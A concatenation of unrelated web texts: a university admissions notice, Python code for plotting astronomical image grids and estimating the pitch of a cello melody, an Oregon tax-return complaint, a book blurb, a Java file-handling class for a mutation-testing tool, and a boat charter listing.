Applications are invited (in Form A) for admission to the M.Phil. and Ph.D. programmes in different subjects (as specified on the University website www.uniraj.ernet.in or www.uniraj.ac.in). As per the new rules, admission to these programmes will be made through an entrance test (Uniraj-MPAT) for each subject/discipline. Students seeking admission in affiliated colleges are also required to take the Uniraj-MPAT. Students who have qualified UGC/CSIR NET, SLET (conducted by Rajasthan State only) or GATE, or who hold a Teacher Fellowship, are exempted from the Test. For the M.Phil. programme, teachers permanently appointed prior to 1991-92 are also exempted from Uniraj-MPAT, as are, for the Ph.D. programme, permanent teachers appointed on a substantive basis with three years of continuous service on a regular pay scale. However, students and teachers exempted from the Test are still required to fill in Form B.
#!/usr/bin/env python # -*- coding: utf8 -*- # ***************************************************************** # ** PTS -- Python Toolkit for working with SKIRT ** # ** © Astronomical Observatory, Ghent University ** # ***************************************************************** ## \package pts.magic.plot.imagegrid Contains the ImageGridPlotter class. # ----------------------------------------------------------------- # Ensure Python 3 compatibility from __future__ import absolute_import, division, print_function # Import standard modules import math from scipy import ndimage import copy import matplotlib.pyplot as plt import numpy as np from mpl_toolkits.axes_grid1 import AxesGrid import matplotlib.gridspec as gridspec import glob from matplotlib import colors from matplotlib import cm from matplotlib.colors import LogNorm import pyfits from collections import OrderedDict from textwrap import wrap from astropy.io import fits from pyfits import PrimaryHDU, Header from astropy.visualization import SqrtStretch, LogStretch from astropy.visualization.mpl_normalize import ImageNormalize import aplpy import wcsaxes import matplotlib.colors as mpl_colors import matplotlib.colorbar as mpl_colorbar # Import the relevant PTS classes and modules from ...core.tools.logging import log # ----------------------------------------------------------------- class ImageGridPlotter(object): """ This class ... """ def __init__(self, title=None): """ The constructor ... :param title: """ # Set the title self.title = title # Figure and grid self._figure = None self._grid = None # Properties self.style = "dark" # "dark" or "light" self.transparent = True self.format = None self.colormap = "viridis" self.vmin = None # ----------------------------------------------------------------- def set_title(self, title): """ This function ... 
:param title: :return: """ self.title = title # ----------------------------------------------------------------- class StandardImageGridPlotter(ImageGridPlotter): """ This class ... """ def __init__(self, title=None): """ The constructor ... :param title: """ # Call the constructor of the base class super(StandardImageGridPlotter, self).__init__(title) # -- Attributes -- # The images to be plotted self.images = OrderedDict() # Masks to be overlayed on the images self.masks = dict() # Regions to be overlayed on the images self.regions = dict() # Properties self.ncols = 7 self.width = 16 # ----------------------------------------------------------------- def run(self, output_path): """ This function ... :param output_path: :return: """ # Make the plot self.plot(output_path) # ----------------------------------------------------------------- def add_image(self, image, label, mask=None, region=None): """ This function ... :param image: :param label: :param mask: :param region: :return: """ self.images[label] = image if mask is not None: self.masks[label] = mask if region is not None: self.regions[label] = region # ----------------------------------------------------------------- @property def nimages(self): """ This function ... :return: """ return len(self.images) # ----------------------------------------------------------------- def plot(self, path): """ This function ... 
:param path: :return: """ # Determine the necessary number of rows nrows = int(math.ceil(self.nimages / self.ncols)) ratio = float(nrows) / float(self.ncols) height = ratio * self.width # Create the figure self._figure = plt.figure(figsize=(self.width, height)) self._figure.subplots_adjust(hspace=0.0, wspace=0.0) #self._figure.text(0.385, 0.97, "Offset from centre (degrees)", color='black', size='16', weight='bold') #self._figure.text(0.02, 0.615, "Offset from centre (degrees)", color='black', size='16', weight='bold', rotation='vertical') def standard_setup(sp): sp.set_frame_color('black') sp.set_tick_labels_font(size='10') sp.set_axis_labels_font(size='12') # sp.set_tick_labels_format(xformat='hh:mm',yformat='dd:mm') sp.set_xaxis_coord_type('scalar') sp.set_yaxis_coord_type('scalar') sp.set_tick_color('black') sp.recenter(x=0.0, y=0.0, width=3., height=0.6) sp.set_tick_xspacing(0.4) sp.set_tick_yspacing(0.25) sp.set_system_latex(True) sp.tick_labels.hide() sp.axis_labels.hide() # Create grid #self._grid = AxesGrid(self._figure, 111, # nrows_ncols=(nrows, self.ncols), # axes_pad=0.0, # label_mode="L", # #share_all=True, # share_all=False, # cbar_location="right", # cbar_mode="single", # cbar_size="0.5%", # cbar_pad="0.5%") # cbar_mode="single" gs = gridspec.GridSpec(nrows, self.ncols, wspace=0.0, hspace=0.0) # Loop over the images counter = 0 ax = None for label in self.images: row = int(counter / self.ncols) col = counter % self.ncols frame = self.images[label] #ax = self._grid[counter] subplotspec = gs[row, col] #points = subplotspec.get_position(self._figure).get_points() #print(points) #x_min = points[0, 0] #x_max = points[1, 0] #y_min = points[0, 1] #y_max = points[1, 1] # width = x_max - x_min # height = y_max - y_min # ax = self._figure.add_axes([x_min, y_min, width, height]) #ax = plt.subplot(subplotspec) #shareax = ax if ax is not None else None #ax = plt.subplot(subplotspec, projection=frame.wcs.to_astropy(), sharex=shareax, sharey=shareax) ax = 
plt.subplot(subplotspec, projection=frame.wcs.to_astropy()) #lon = ax.coords[0] #lat = ax.coords[1] #overlay = ax.get_coords_overlay('fk5') #overlay.grid(color='white', linestyle='solid', alpha=0.5) # Determine the maximum value in the box and the mimimum value for plotting norm = ImageNormalize(stretch=LogStretch()) #min_value = np.nanmin(frame) min_value = self.vmin if self.vmin is not None else np.nanmin(frame) max_value = 0.5 * (np.nanmax(frame) + min_value) #f1.show_colorscale(vmin=min_value, vmax=max_value, cmap="viridis") #f1.show_beam(major=0.01, minor=0.01, angle=0, fill=True, color='white') ## f1.axis_labels.show_y() #f1.tick_labels.set_xposition('top') #f1.tick_labels.show() ax.set_xticks([]) ax.set_yticks([]) ax.xaxis.set_ticklabels([]) ax.yaxis.set_ticklabels([]) #ax.spines['bottom'].set_color("white") #ax.spines['top'].set_color("white") #ax.spines['left'].set_color("white") #ax.spines['right'].set_color("white") ax.xaxis.label.set_color("white") ax.yaxis.label.set_color("white") ax.tick_params(axis='x', colors="white") ax.tick_params(axis='y', colors="white") # Get the color map cmap = cm.get_cmap(self.colormap) # Set background color background_color = cmap(0.0) ax.set_axis_bgcolor(background_color) # Plot frame[np.isnan(frame)] = 0.0 # Add mask if present if label in self.masks: frame[self.masks[label]] = float('nan') ax.imshow(frame, vmin=min_value, vmax=max_value, cmap=cmap, origin='lower', norm=norm, interpolation="nearest", aspect=1) # Add region if present if label in self.regions: for patch in self.regions[label].to_mpl_patches(): ax.add_patch(patch) # Add the label ax.text(0.95, 0.95, label, color='white', transform=ax.transAxes, fontsize=10, va="top", ha="right") # fontweight='bold' #ax.coords.grid(color='white') counter += 1 all_axes = self._figure.get_axes() # show only the outside spines for ax in all_axes: for sp in ax.spines.values(): sp.set_visible(False) #if ax.is_first_row(): # ax.spines['top'].set_visible(True) #if 
ax.is_last_row(): # ax.spines['bottom'].set_visible(True) #if ax.is_first_col(): # ax.spines['left'].set_visible(True) #if ax.is_last_col(): # ax.spines['right'].set_visible(True) # Add a colourbar #axisf3 = self._figure.add_axes(gs[row, col+1:]) subplotspec = gs[row, col+1:] points = subplotspec.get_position(self._figure).get_points() #print("colorbar points:", points) x_min = points[0,0] x_max = points[1,0] y_min = points[0,1] y_max = points[1,1] #print((x_min, x_max), (y_min, y_max)) #points_flattened = points.flatten() #print("colorbar:", points_flattened) x_center = 0.5 * (x_min + x_max) y_center = 0.5 * (y_min + y_max) width = 0.9* (x_max - x_min) height = 0.2 * (y_max - y_min) x_min = x_center - 0.5 * width x_max = x_center + 0.5 * width y_min = y_center - 0.5 * height y_max = y_center + 0.5 * height #ax_cm = plt.subplot(points) #ax_cm = plt.axes(points_flattened) ax_cm = self._figure.add_axes([x_min, y_min, width, height]) cm_cm = cm.get_cmap(self.colormap) norm_cm = mpl_colors.Normalize(vmin=0, vmax=1) cb = mpl_colorbar.ColorbarBase(ax_cm, cmap=cm_cm, norm=norm_cm, orientation='horizontal') cb.set_label('Flux (arbitrary units)') # Set the title if self.title is not None: self._figure.suptitle("\n".join(wrap(self.title, 60))) #plt.tight_layout() # Debugging if type(path).__name__ == "BytesIO": log.debug("Saving the SED plot to a buffer ...") elif path is None: log.debug("Showing the SED plot ...") else: log.debug("Saving the SED plot to " + str(path) + " ...") if path is not None: # Save the figure plt.savefig(path, bbox_inches='tight', pad_inches=0.25, transparent=self.transparent, format=self.format) else: plt.show() plt.close() # ----------------------------------------------------------------- # TODO: add option to plot histograms of the residuals (DL14) class ResidualImageGridPlotter(ImageGridPlotter): """ This class ... """ def __init__(self, title=None): """ The constructor ... 
""" # Call the constructor of the base class super(ResidualImageGridPlotter, self).__init__(title) # -- Attributes -- # Set the title self.title = title # The rows of the grid self.rows = OrderedDict() self.plot_residuals = [] # The names of the columns self.column_names = ["Observation", "Model", "Residual"] # Box (SkyRectangle) where to cut off the maps self.box = None self._plotted_rows = 0 self.absolute = False # ----------------------------------------------------------------- def set_bounding_box(self, box): """ This function ... :param box: :return: """ self.box = box # ----------------------------------------------------------------- def add_row(self, image_a, image_b, label, residuals=True): """ This function ... :param image_a: :param image_b: :param label: :param residuals: :return: """ self.rows[label] = (image_a, image_b) if residuals: self.plot_residuals.append(label) # ----------------------------------------------------------------- def set_column_names(self, name_a, name_b, name_residual="Residual"): """ This function ... :param name_a: :param name_b: :param name_residual: :return: """ self.column_names = [name_a, name_b, name_residual] # ----------------------------------------------------------------- def run(self, output_path): """ This function ... :param output_path: :return: """ # Make the plot self.plot(output_path) # ----------------------------------------------------------------- def clear(self): """ This function ... :return: """ # Set default values for all attributes self.title = None self.rows = OrderedDict() self.plot_residuals = [] self.column_names = ["Observation", "Model", "Residual"] self._figure = None self._grid = None self._plotted_rows = 0 # ----------------------------------------------------------------- def plot(self, path): """ This function ... 
:param path: :return: """ # Determine the wcs with the smallest pixelscale reference_wcs = None for label in self.rows: if reference_wcs is None or reference_wcs.average_pixelscale > self.rows[label][0].average_pixelscale: reference_wcs = copy.deepcopy(self.rows[label][0].wcs) number_of_rows = len(self.rows) axisratio = float(self.rows[self.rows.keys()[0]][0].xsize) / float(self.rows[self.rows.keys()[0]][0].ysize) #print("axisratio", axisratio) one_frame_x_size = 3. fig_x_size = 3. * one_frame_x_size #fig_y_size = number_of_rows * one_frame_x_size / axisratio fig_y_size = one_frame_x_size * number_of_rows * 0.7 # Create a figure self._figure = plt.figure(figsize=(fig_x_size, fig_y_size)) self._figure.subplots_adjust(left=0.05, right=0.95) # Create grid self._grid = AxesGrid(self._figure, 111, nrows_ncols=(len(self.rows), 3), axes_pad=0.02, label_mode="L", share_all=True, cbar_location="right", cbar_mode="single", cbar_size="0.5%", cbar_pad="0.5%", ) # cbar_mode="single" for cax in self._grid.cbar_axes: cax.toggle_label(False) #rectangle_reference_wcs = self.box.to_pixel(reference_wcs) data = OrderedDict() greatest_shape = None if self.box is not None: for label in self.rows: wcs = self.rows[label][0].wcs rectangle = self.box.to_pixel(wcs) y_min = rectangle.lower_left.y y_max = rectangle.upper_right.y x_min = rectangle.lower_left.x x_max = rectangle.upper_right.x reference = self.rows[label][0][y_min:y_max, x_min:x_max] model = self.rows[label][1][y_min:y_max, x_min:x_max] data[label] = (reference, model) print(label, "box height/width ratio:", float(reference.shape[0])/float(reference.shape[1])) if greatest_shape is None or greatest_shape[0] < reference.shape[0]: greatest_shape = reference.shape else: for label in self.rows: reference = self.rows[label][0] model = self.rows[label][1] data[label] = (reference, model) if greatest_shape is None or greatest_shape[0] < reference.shape[0]: greatest_shape = reference.shape # Loop over the rows for label in self.rows: #wcs 
= self.rows[label][0].wcs if data[label][0].shape == greatest_shape: reference = data[label][0] model = data[label][1] else: factor = float(greatest_shape[0]) / float(data[label][0].shape[0]) order = 0 reference = ndimage.zoom(data[label][0], factor, order=order) model = ndimage.zoom(data[label][1], factor, order=order) if self.absolute: residual = model - reference else: residual = (model - reference)/model # Plot the reference image x0, x1, y0, y1, vmin, vmax = self.plot_frame(reference, label, 0) # Plot the model image x0, x1, y0, y1, vmin, vmax = self.plot_frame(model, label, 1, vlimits=(vmin,vmax)) # Plot the residual image x0, x1, y0, y1, vmin, vmax = self.plot_frame(residual, label, 2, vlimits=(vmin,vmax)) self._plotted_rows += 3 #self._grid.axes_llc.set_xlim(x0, x1) #self._grid.axes_llc.set_ylim(y0, y1) self._grid.axes_llc.set_xticklabels([]) self._grid.axes_llc.set_yticklabels([]) self._grid.axes_llc.get_xaxis().set_ticks([]) # To remove ticks self._grid.axes_llc.get_yaxis().set_ticks([]) # To remove ticks # Add title if requested #if self.title is not None: self._figure.suptitle(self.title, fontsize=12, fontweight='bold') plt.tight_layout() # Debugging log.debug("Saving the SED plot to " + path + " ...") # Save the figure plt.savefig(path, bbox_inches='tight', pad_inches=0.25, format=self.format, transparent=self.transparent) plt.close() # ----------------------------------------------------------------- def plot_frame(self, frame, row_label, column_index, borders=(0,0,0,0), vlimits=None): """ This function ... 
:param frame: :param column_index: :param row_label: :param borders: :param vlimits: :return: """ grid_index = self._plotted_rows + column_index x0 = borders[0] y0 = borders[1] #x1 = frame.xsize #y1 = frame.ysize x1 = frame.shape[1] y1 = frame.shape[0] #vmax = np.max(frame) # np.mean([np.max(data_ski),np.max(data_ref)]) #vmin = np.min(frame) # np.mean([np.min(data_ski),np.min(data_ref)]) #if min_int == 0.: min_int = vmin #else: vmin = min_int #if max_int == 0.: max_int = vmax #else: vmax = max_int if vlimits is None: min_value = self.vmin if self.vmin is not None else np.nanmin(frame) max_value = 0.5 * (np.nanmax(frame) + min_value) else: min_value = vlimits[0] max_value = vlimits[1] aspect = "equal" if column_index != 2: # Get the color map cmap = cm.get_cmap(self.colormap) # Set background color background_color = cmap(0.0) self._grid[grid_index].set_axis_bgcolor(background_color) # Plot frame[np.isnan(frame)] = 0.0 norm = ImageNormalize(stretch=LogStretch()) im = self._grid[grid_index].imshow(frame, cmap=cmap, vmin=min_value, vmax=max_value, interpolation="nearest", origin="lower", aspect=aspect, norm=norm) # 'nipy_spectral_r', 'gist_ncar_r' else: if self.absolute: # Get the color map cmap = cm.get_cmap(self.colormap) norm = ImageNormalize(stretch=LogStretch()) else: cmap = discrete_cmap() min_value = 0.001 max_value = 1. 
norm = None print(min_value, max_value) im = self._grid[grid_index].imshow(frame, cmap=cmap, vmin=min_value, vmax=max_value, interpolation="nearest", origin="lower", aspect=aspect, norm=norm) cb = self._grid[grid_index].cax.colorbar(im) # cb.set_xticklabels(labelsize=1) # grid[number+numb_of_grid].cax.toggle_label(True) for cax in self._grid.cbar_axes: cax.toggle_label(True) cax.axis[cax.orientation].set_label(' ') # cax.axis[cax.orientation].set_fontsize(3) cax.tick_params(labelsize=3) cax.set_ylim(min_value, max_value) # cax.set_yticklabels([0, 0.5, 1]) if column_index == 0: self._grid[grid_index].text(0.03, 0.95, row_label, color='black', transform=self._grid[grid_index].transAxes, fontsize=fsize + 2, fontweight='bold', va='top') # if numb_of_grid==0: # crea_scale_bar(grid[number+numb_of_grid],x0,x1,y0,y1,pix2sec) # crea_scale_bar(grid[number+numb_of_grid],x0,x1,y0,y1,pix2sec) return x0, x1, y0, y1, min_value, max_value # ----------------------------------------------------------------- fsize = 2 def sort_numbs(arr): numbers = [] for k in range(len(arr)): numb = str(arr[k].split('/')[-1].split('_')[-1].split('.fits')) #print numb numbers.append(numb) a = sorted(numbers) new_arr = [] for k in range(len(a)): ind = numbers.index(a[k]) new_arr.append(arr[ind]) return new_arr def line_reg(header1): ima_pix2sec = float(header1['PIXSCALE_NEW']) nx = int(header1['NAXIS1']) ny = int(header1['NAXIS2']) scale = int(round(nx/8.*ima_pix2sec,-1)) x2 = nx*9.8/10. x1 = x2 - scale/ima_pix2sec y1 = ny/7. y2 = y1 return x1,y1,x2,y2,scale # Define new colormap for residuals def discrete_cmap(N=8): # define individual colors as hex values cpool = [ '#000000', '#00EE00', '#0000EE', '#00EEEE', '#EE0000','#FFFF00', '#EE00EE', '#FFFFFF'] cmap_i8 = colors.ListedColormap(cpool[0:N], 'i8') cm.register_cmap(cmap=cmap_i8) return cmap_i8 def define_scale_bar_length(x_extent,pix2sec): scale_bar = round((x_extent * pix2sec) / 6.,0) return int(5. 
* round(float(scale_bar)/5.)) # Length of the bar in arcsec def crea_scale_bar(ax, x0, x1, y0, y1, pix2sec): offset_x_factor = 0.98 offset_y_factor = 0.1 x_extent = x1 - x0 scale_bar_length = define_scale_bar_length(x_extent, pix2sec) / 2. #### divide by 2 !!! xc = fabs(x1)-scale_bar_length/pix2sec - (1.-offset_x_factor)*(x1-x0) yc = fabs(y0) + (y1-y0)* offset_y_factor ax.errorbar(xc, yc, xerr=scale_bar_length/pix2sec,color='black',capsize=1,c='black') ax.text(xc, yc, str(int(scale_bar_length*2.))+'\"', color='black',fontsize=fsize+1, horizontalalignment='center', verticalalignment='bottom') # -----------------------------------------------------------------
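The residual rows above upsample whichever frame is smaller with `scipy.ndimage.zoom` (order 0, nearest neighbour) before differencing. A minimal standalone sketch of that step, with made-up 4×4 reference and 2×2 model frames (the values are illustrative only):

```python
import numpy as np
from scipy import ndimage

reference = np.arange(16.0).reshape(4, 4) + 1.0   # pretend observed frame
model = np.arange(4.0).reshape(2, 2) + 1.0        # pretend model frame, lower resolution

# Upsample the model to the reference shape; order=0 (nearest neighbour)
# replicates pixels instead of inventing interpolated flux values
factor = reference.shape[0] / model.shape[0]
model_zoomed = ndimage.zoom(model, factor, order=0)

absolute_residual = model_zoomed - reference
relative_residual = (model_zoomed - reference) / model_zoomed
```

The relative form matches the `(model - reference)/model` convention used when `self.absolute` is False.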
Filed an OR 40P Part-Year Resident return for 2015? If both apply to you and you have received a letter from ODR with a proposed refund adjustment, then there is a good chance that their adjustment is incorrect – especially if they are proposing a lower tax amount that is equal to the tax on the OR-PTE-PY form, Section B, line 19a multiplied by your Oregon percentage from Form 40P, line 35. The OR-PTE-PY is new this year, and the worksheet in Section B can be very confusing the first time through, but the most important thing is that the worksheet already multiplies the tax amounts by the Oregon percentage and the Oregon non-passive percentage, so by the time you get to line 19a, it is already pro-rated. For this very reason, ODR lists specific instructions below line 19a: “Don’t multiply the tax by the Oregon percentage as instructed on line 48 of the Form 40P.” However, on the notice I received, they have done just that in their proposed tax number – they have multiplied the amount on line 19a from OR-PTE-PY Section B by the Oregon percentage, which is incorrect. We had even clearly marked box 47c on Form 40P as they requested, but they still made the error. The thing that frustrated me is that the return was transmitted on 4/14/16 and they had a letter sent out on 4/22/16, which means a machine is likely kicking these out without any manual review, and this could result in a large number of erroneous tax refunds. This is a waste of everyone’s time and money, and coupled with the disastrous late release of OTTER 2016, I am starting to think Oregon needs to follow Intel’s lead and clean house at ODR and OED.
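To make the double pro-ration concrete, here is a sketch with made-up numbers (the dollar amounts and percentage below are purely illustrative, not from any actual return):

```python
# Purely illustrative numbers -- not from any actual return.
full_year_pte_tax = 10000.0  # hypothetical reduced-rate tax before pro-ration
oregon_percentage = 0.40     # hypothetical Oregon percentage, Form 40P line 35

# The Section B worksheet already applies the Oregon percentage, so the
# amount on OR-PTE-PY line 19a is pro-rated by the time you read it:
line_19a = full_year_pte_tax * oregon_percentage   # the correct tax

# The proposed adjustment described above applies the percentage again:
odr_proposed = line_19a * oregon_percentage        # understated tax
```

Applying the 40 percent a second time turns a correct 4,000 into an erroneous 1,600, which is exactly the kind of too-low proposed tax the letter contained.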
import os import sys import numpy as np import math from scipy.signal import get_window import matplotlib.pyplot as plt sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../software/models/')) import utilFunctions as UF import harmonicModel as HM import sineModel as SM import stft import dftModel as DFT eps = np.finfo(float).eps """ A6Part1 - Estimate fundamental frequency in polyphonic audio signal Set the analysis parameters used within the function estimateF0() to obtain a good estimate of the fundamental frequency (f0) corresponding to one melody within a complex audio signal. The signal is a cello recording cello-double-2.wav, in which two strings are played simultaneously. One string plays a constant drone while the other string plays a simple melody. You have to choose the analysis parameter values such that only the f0 frequency of the simple melody is tracked. The input argument to the function is the wav file name including the path (inputFile). The function returns a numpy array of the f0 frequency values for each audio frame. For this question we take hopSize (H) = 256 samples. estimateF0() calls f0Detection() function of the harmonicModel.py, which uses the two way mismatch algorithm for f0 estimation. estimateF0() also plots the f0 contour on top of the spectrogram of the audio signal for you to visually analyse the performance of your chosen values for the analysis parameters. In this question we will only focus on the time segment between 0.5 and 4 seconds. So, your analysis parameter values should produce a good f0 contour in this time region. In addition to plotting the f0 contour on the spectrogram, this function also synthesizes the f0 contour. 
You can also evaluate the performance of your chosen analysis parameter values by listening to this synthesized wav file named 'synthF0Contour.wav' Since there can be numerous combinations of the optimal analysis parameter values, the evaluation is done solely on the basis of the output f0 sequence. Note that only the segment of the f0 contour between time 0.5 to 4 seconds is used to evaluate the performance of f0 estimation. Your assignment will be tested only on inputFile = '../../sounds/cello-double-2.wav'. So choose the analysis parameters using which the function estimates the f0 frequency contour corresponding to the string playing simple melody and not the drone. There is no separate test case for this question. You can keep working with the wav file mentioned above and when you think the performance is satisfactory you can submit the assignment. The plots can help you achieve a good performance. Be cautious while choosing the window size. Window size should be large enough to resolve the spectral peaks and small enough to preserve the note transitions. Very large window sizes may smear the f0 contour at note transitions. Depending on the parameters you choose and the capabilities of the hardware you use, the function might take a while to run (even half a minute in some cases). For this part of the assignment please refrain from posting your analysis parameters on the discussion forum. """ def estimateF0(inputFile = '../../sounds/cello-double-2.wav'): """ Function to estimate fundamental frequency (f0) in an audio signal. This function also plots the f0 contour on the spectrogram and synthesize the f0 contour. 
    Input:
        inputFile (string): wav file including the path
    Output:
        f0 (numpy array): array of the estimated fundamental frequency (f0) values
    """
    ### Change these analysis parameter values marked as XX
    window = 'blackman'
    M = 6096
    N = 4096*4
    f0et = 5.0
    t = -60
    minf0 = 40
    maxf0 = 215

    ### Do not modify the code below
    H = 256                                                     # fixed hop size
    fs, x = UF.wavread(inputFile)                               # reading inputFile
    w = get_window(window, M)                                   # obtaining analysis window

    ### Method 1
    f0 = HM.f0Detection(x, fs, w, N, H, t, minf0, maxf0, f0et)  # estimating F0
    # Frame indices must be ints: numpy slicing rejects float bounds
    startFrame = int(np.floor(0.5*fs/H))
    endFrame = int(np.ceil(4.0*fs/H))
    f0[:startFrame] = 0
    f0[endFrame:] = 0
    y = UF.sinewaveSynth(f0, 0.8, H, fs)
    UF.wavwrite(y, fs, 'synthF0Contour.wav')

    ## Code for plotting the f0 contour on top of the spectrogram
    # frequency range to plot
    maxplotfreq = 500.0
    fontSize = 16
    plot = 1

    fig = plt.figure()
    ax = fig.add_subplot(111)

    mX, pX = stft.stftAnal(x, fs, w, N, H)  # using same params as used for analysis
    mX = np.transpose(mX[:,:int(N*(maxplotfreq/fs))+1])

    timeStamps = np.arange(mX.shape[1])*H/float(fs)
    binFreqs = np.arange(mX.shape[0])*fs/float(N)

    plt.pcolormesh(timeStamps, binFreqs, mX)
    plt.plot(timeStamps, f0, color = 'k', linewidth=1.5)
    plt.plot([0.5, 0.5], [0, maxplotfreq], color = 'b', linewidth=1.5)
    plt.plot([4.0, 4.0], [0, maxplotfreq], color = 'b', linewidth=1.5)

    plt.autoscale(tight=True)
    plt.ylabel('Frequency (Hz)', fontsize = fontSize)
    plt.xlabel('Time (s)', fontsize = fontSize)
    plt.legend(('f0',))

    xLim = ax.get_xlim()
    yLim = ax.get_ylim()
    ax.set_aspect((xLim[1]-xLim[0])/(2.0*(yLim[1]-yLim[0])))

    if plot == 1:  # show the plot
        plt.autoscale(tight=True)
        plt.show()
    else:  # save the plot instead
        fig.tight_layout()
        fig.savefig('f0_over_Spectrogram.png', dpi=150, bbox_inches='tight')

    return f0
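The warning above about choosing the window size can be made concrete with a standard rule of thumb (the sampling rate below is an assumption for illustration, and this is not the graded parameter value, which is deliberately not given here): a Blackman window has a main lobe about six bins wide, so resolving two partials separated by Δf Hz needs roughly M ≥ 6·fs/Δf samples.

```python
import math

fs = 44100           # assumed CD-quality sampling rate for the recording
delta_f = 40.0       # smallest partial separation to resolve, in Hz

# Blackman main lobe spans about 6 bins, so the window needs at least
# 6 * fs / delta_f samples to keep two such partials distinguishable.
bins_in_main_lobe = 6
M_min = int(math.ceil(bins_in_main_lobe * fs / delta_f))
```

For these assumed values M_min works out to a few thousand samples, which is why very small windows smear the peaks while very large ones smear the note transitions instead.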
The Sabbath. Just another day? Or a special gift from God…a gift worth “keeping,” as he commands? This positive look at the Sabbath explains why and how to delight in that day as the opportunity reserved by God for his people to be refreshed in fellowship with him.
import fnmatch import io import os import shutil from typing import Dict, List class JavaIO(object): """ """ def __init__(self, verbose=False): self.verbose = False self.sourceDirectory = None self.targetDirectory = None self.fileList = list() def filterFiles(self, mode="blacklist", filterList=None): """ :param mode: :type mode: :param filterList: :type filterList: :return: :rtype: """ if filterList is None: return assert isinstance(filterList, list) assert mode == "blacklist" or mode == "whitelist" alteredList = list() packageList = list() cuList = list() for statement in filterList: if '\\' in statement or '/' in statement: cuList.append(statement) else: packageList.append(statement) for packageName in packageList: if str(packageName).strip() == "": continue # we need to do this so that we avoid partial matching dirList = list() dirList.append("") dirList.extend(packageName.strip().split(".")) dirList.append("") dirName = os.sep.join(dirList) alteredList.extend([x for x in self.fileList if dirName in os.sep.join(["", x, ""])]) for cuName in cuList: alteredList.extend([x for x in self.fileList if cuName in x]) if mode == "whitelist": self.fileList = list(set(alteredList)) elif mode == "blacklist": self.fileList = list(set(self.fileList) - set(alteredList)) def listFiles(self, targetPath=None, buildPath=None, filterList=None, filterType="blacklist", desiredType="*.java"): """ :param targetPath: :type targetPath: :param buildPath: :type buildPath: :param filterList: :type filterList: :param filterType: :type filterType: :param desiredType: :type desiredType: """ # print targetPath, desiredType self.sourceDirectory = targetPath self.targetDirectory = os.path.abspath(os.path.join(buildPath, "LittleDarwinResults")) for root, dirnames, filenames in os.walk(self.sourceDirectory): for filename in fnmatch.filter(filenames, desiredType): self.fileList.append(os.path.join(root, filename)) self.filterFiles(mode=filterType, filterList=filterList) if not 
os.path.exists(self.targetDirectory): os.makedirs(self.targetDirectory) def getFileContent(self, filePath=None): """ :param filePath: :type filePath: :return: :rtype: """ with io.open(filePath, mode='r', errors='replace') as contentFile: file_data = contentFile.read() normalizedData = str(file_data) return normalizedData def getAggregateComplexityReport(self, mutantDensityPerMethod: Dict[str, int], cyclomaticComplexityPerMethod: Dict[str, int], linesOfCodePerMethod: Dict[str, int]) -> Dict[str, List[int]]: """ :param mutantDensityPerMethod: :type mutantDensityPerMethod: :param cyclomaticComplexityPerMethod: :type cyclomaticComplexityPerMethod: :param linesOfCodePerMethod: :type linesOfCodePerMethod: :return: :rtype: """ aggregateReport = dict() methodList = set(mutantDensityPerMethod.keys()) methodList.update(cyclomaticComplexityPerMethod.keys()) methodList.update(linesOfCodePerMethod.keys()) for method in methodList: aggregateReport[method] = [mutantDensityPerMethod.get(method, 0), cyclomaticComplexityPerMethod.get(method, 1), linesOfCodePerMethod.get(method, 0)] return aggregateReport def generateNewFile(self, originalFile=None, fileData=None, mutantsPerLine=None, densityReport=None, aggregateComplexity=None): """ :param originalFile: :type originalFile: :param fileData: :type fileData: :param mutantsPerLine: :type mutantsPerLine: :param densityReport: :type densityReport: :param aggregateComplexity: :type aggregateComplexity: :return: :rtype: """ originalFileRoot, originalFileName = os.path.split(originalFile) targetDir = os.path.join(self.targetDirectory, os.path.relpath(originalFileRoot, self.sourceDirectory), originalFileName) if not os.path.exists(targetDir): os.makedirs(targetDir) if not os.path.isfile(os.path.join(targetDir, "original.java")): shutil.copyfile(originalFile, os.path.join(targetDir, "original.java")) if mutantsPerLine is not None and densityReport is not None and aggregateComplexity is not None: densityPerLineCSVFile = 
os.path.abspath(os.path.join(targetDir, "MutantDensityPerLine.csv")) complexityPerMethodCSVFile = os.path.abspath(os.path.join(targetDir, "ComplexityPerMethod.csv")) densityReportFile = os.path.abspath(os.path.join(targetDir, "aggregate.html")) if not os.path.isfile(complexityPerMethodCSVFile) or not os.path.isfile( densityPerLineCSVFile) or not os.path.isfile(densityReportFile): with open(densityPerLineCSVFile, 'w') as densityFileHandle: for key in sorted(mutantsPerLine.keys()): densityFileHandle.write(str(key) + ',' + str(mutantsPerLine[key]) + '\n') with open(complexityPerMethodCSVFile, 'w') as densityFileHandle: for key in sorted(aggregateComplexity.keys()): line = [str(key)] line.extend([str(x) for x in aggregateComplexity[key]]) densityFileHandle.write(";".join(line) + '\n') with open(densityReportFile, 'w') as densityFileHandle: densityFileHandle.write(densityReport) counter = 1 while os.path.isfile(os.path.join(targetDir, str(counter) + ".java")): counter += 1 targetFile = os.path.abspath(os.path.join(targetDir, str(counter) + ".java")) with open(targetFile, 'w') as contentFile: contentFile.write(fileData) if self.verbose: print("--> generated file: ", targetFile) return os.path.relpath(targetFile, self.targetDirectory)
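The package-name filtering in `filterFiles` above wraps both the dotted package and each file path in path separators before substring matching, so that a filter for `org.foo` cannot partially match files under `org.foobar`. A minimal standalone sketch of that trick (the file names are made up):

```python
import os

def matches_package(file_path, package_name):
    # Wrap both sides in separators so "org.foo" cannot match "org/foobar"
    dir_name = os.sep.join([""] + package_name.strip().split(".") + [""])
    return dir_name in os.sep.join(["", file_path, ""])

files = [os.sep.join(["src", "org", "foo", "A.java"]),
         os.sep.join(["src", "org", "foobar", "B.java"])]
hits = [f for f in files if matches_package(f, "org.foo")]
```

Only `A.java` matches: the trailing separator after `foo` rules out the `foobar` path, which is exactly the partial-matching problem the comment in `filterFiles` mentions.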
New for 2019! Blue Moon will be joining the fleet early spring. With acres of space above and below decks, Blue Moon can comfortably accommodate up to 8 guests using the saloon conversion. We'll have 'proper' images of her once she arrives.
